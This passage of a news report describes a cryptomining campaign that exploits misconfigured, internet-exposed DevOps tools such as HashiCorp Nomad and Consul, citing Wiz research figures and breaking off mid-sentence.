Illicit crypto-miners pouncing on lazy DevOps configs leaving clouds vulnerable

Summary

Up to a quarter of all cloud users are at risk of having their computing resources stolen and used to illicitly mine for cryptocurrency, after crims cooked up a campaign that targets publicly accessible DevOps tools. Wiz Threat Research spotted the campaign and attributed it to an attacker it named JINX–0132, which it says exploits misconfigurations and vulnerabilities in multiple applications to deploy mining software. JINX–0132 targets a "wide range" of DevOps tools, but Wiz thinks it prefers HashiCorp’s Nomad and Consul tools, plus Docker API and Gitea. According to threat researchers Gili Tikochinski, Danielle Aminov and Merav Bar, Wiz data indicates that 25 percent of all cloud environments are running at least one of these technologies, and more than 20 percent run HashiCorp Consul. We've asked the Wiz kids how many instances of those applications JINX–0132 hit and will update this story when we hear back from the soon-to-be-Google-owned security shop. "Of those environments using these DevOps tools, five percent expose them directly to the Internet, and among those exposed deployments, 30 percent are misconfigured," the team wrote. Here's a look at the four under–fire tools, and the flaws in each that Wiz says JINX–0132 is looking to abuse. HashiCorp Nomad Nomad is a scheduler and orchestrator used to deploy containers and applications across multiple platforms. According to HashiCorp's documentation, Nomad is not secure by default. For example, default settings in the software’s job queue feature, which schedules and manages jobs, allow any user with access to the Nomad server API to create and run such jobs. HashiCorp suggests users take several steps to address that. Therein lies the problem, according to Wiz, because JINX–0132 found a publicly exposed Nomad server – Shodan scans can find 405 of them – running out–of–the–box settings without security features enabled. JINX–0132 used that insecure server to download and run XMRig miner software. To ensure t...